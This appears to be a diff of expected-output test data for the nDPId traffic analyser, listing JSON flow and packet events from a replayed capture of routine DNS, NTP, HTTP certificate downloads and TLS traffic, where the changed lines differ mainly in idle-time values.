-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1626168077632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077632,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pgVbXIGxxGts6AS\/oilegAAAgQFtAQCCAqgBBfWPdH4\/AEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1626168077632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077632,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KYAFDHEa2zFW1yB4AQCArKugAAAQEICj3R+QegBBfW"} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1626168077633,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1626168077633,"pkt":"8BiYFWV8WNVuaKQACABFAABYGXsAAHgRVukICAgIwKgBeQA11SEAREvAQG+BgAABAAEAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAHADAABAAEAAAATAAQCFiHr"} 00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077633,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077660,"flow_last_seen":1626168077660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077660,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1626168077660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077660,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KZAFBWi1SkAAAAALAC\/\/+bzgAAAgQFtAEDAwYBAQgKPdH5IAAAAAAEAgAA"} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1626168077670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077670,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pnFRlw1VotUpaAS\/ohpIwAAAgQFtAQCCAqAXqM6PdH5IAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1626168077670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077670,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KZAFBWi1SlxUZcNoAQCAqOZAAAAQEICj3R+SqAXqM6"} -00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077734,"flow_last_seen":1626168077734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168077734,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1626168077734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077734,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGezbAqAF5jFJxGtKRAbvAP+ze5D7DE4ARCAAudQAAAQEICj3R+WZAyN\/6"} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077660,"flow_last_seen":1626168077660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077660,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1626168077660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077660,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KZAFBWi1SkAAAAALAC\/\/+bzgAAAgQFtAEDAwYBAQgKPdH5IAAAAAAEAgAA"} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1626168077670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077670,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pnFRlw1VotUpaAS\/ohpIwAAAgQFtAQCCAqAXqM6PdH5IAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1626168077670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077670,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KZAFBWi1SlxUZcNoAQCAqOZAAAAQEICj3R+SqAXqM6"} +00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077734,"flow_last_seen":1626168077734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168077734,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1626168077734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077734,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGezbAqAF5jFJxGtKRAbvAP+ze5D7DE4ARCAAudQAAAQEICj3R+WZAyN\/6"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1626168077735,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1626168077735,"pkt":"WNVuaKQA8BiYFWV8CABFAABCGz0AAEARjT3AqAF5CAgICP69ADUALrrFTnABAAABAAAAAAAACnRpbWUtbWFjb3MFYXBwbGUDY29tAAABAAE="} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -103,84 +103,84 @@ 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1626168077750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168077750,"pkt":"WNVuaKQA8BiYFWV8CABFAABMdJwAAEAR+uvAqAF5Ef02+8BAAHsAOBCpIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1626168077780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168077780,"pkt":"8BiYFWV8WNVuaKQACABFAABMU7FAADcR5NYR\/Tb7wKgBeQB7wEAAOB9pJAED6wAAAAAAAAALU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mN1Ssd5+SX2Y3VLRfJ"} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAABTEkpAADAGeM2MUnEawKgBeQG70pHkPsMTwD\/s34AYAEWx6wAAAQEICkDJEb890flmFQMDABpqQiSe8lZWsEgoTupah5UnGMUqJn8V431Q+A=="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAAA0EktAADAGeOuMUnEawKgBeQG70pHkPsMywD\/s34ARAEUESgAAAQEICkDJEcA90flm"} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1626168077848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAABTEkpAADAGeM2MUnEawKgBeQG70pHkPsMTwD\/s34AYAEWx6wAAAQEICkDJEb890flmFQMDABpqQiSe8lZWsEgoTupah5UnGMUqJn8V431Q+A=="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1626168077848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAAA0EktAADAGeOuMUnEawKgBeQG70pHkPsMywD\/s34ARAEUESgAAAQEICkDJEcA90flm"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1626168078653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1626168078653,"pkt":"WNVuaKQA8BiYFWV8CABFAABGLVcAAEARex\/AqAF5CAgICMseADUAMgvmotEBAAABAAAAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAAB"} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1626168078654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168078654,"pkt":"WNVuaKQA8BiYFWV8CABFAABITn4AAEARWfbAqAF5CAgICMseADUANKzYlN8BAAABAAAAAAAAAjI2AzExMwI4MgMxNDAHaW4tYWRkcgRhcnBhAAAMAAE="} 00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078653,"flow_last_seen":1626168078654,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168078654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"26.113.82.140.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 